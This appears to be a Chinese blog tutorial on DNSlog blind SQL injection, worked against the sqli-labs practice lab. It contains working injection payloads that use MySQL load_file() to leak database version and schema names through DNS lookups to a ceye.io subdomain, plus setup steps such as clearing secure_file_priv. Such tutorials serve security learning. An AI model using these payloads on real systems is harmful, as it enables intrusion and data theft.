布尔盲注和时间盲注相当于猜单词的游戏,我们需要对每一位逐步的猜测,效率很低,需要发送很多的请求进行判断,很可能会触发安全设备的防护
我们需要一种方式能够减少请求,直接回显数据——Dnslog注入
Dns在解析的时候会留下日志,通过读取多级域名的解析日志,获取请求信息
Dnslog盲注方法
登录http://ceye.io/网站并注册,得到属于自己的identifier
先尝试在终端运行curl dnslog.4ke30o.ceye.io
Mysql load_file()函数可以发起请求,LOAD_FILE()函数操作需要用户具有FILE权限
构造语句,利用load_file()函数发起请求,使用Dnslog接收请求,获取数据
只能在windows系统下使用load_file()发起请求,在Linux环境下不能使用load_file()发起请求
使用语句select load_file(concat('\\\\',(select version()),'.mysql.4ke30o.ceye.io\\abc'))
在使用前务必记得设置secure_file_priv为"",我使用的是PHPstudy集成环境,所以访问http://localhost/phpMyAdmin4.8.5/来使用SQL
重启mysql服务
使用语句,查询自己想要的数据,此处查询版本信息
以第九关为例(在windows上运行)
使用http://localhost/sqli-labs-master/index.html进入SQLInjection页面
http://localhost/sqli-labs-master/Less-9/?id=1%27%20and%20(select%20load_file(concat(%27\\\\%27,(select%20version()),%27.mysql.4ke30o.ceye.io\\abc%27)))--+
http://localhost/sqli-labs-master/Less-9/?id=1%27%20and%20(select%20load_file(concat(%27\\\\%27,(select%20schema_name%20from%20information_schema.schemata%20limit%201,1),%27.mysql.4ke30o.ceye.io\\abc%27)))--+
一般来说,查询不到就说明语法有问题,可以先在mysql中尝试,在url中务必记得
1、?id=1’ and
2、and后面的语句要用括号括起来
3、不要忘记注释掉后面的语句–+或者%23
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· 三行代码完成国际化适配,妙~啊~
· .NET Core 中如何实现缓存的预热?
· 如何调用 DeepSeek 的自然语言处理 API 接口并集成到在线客服系统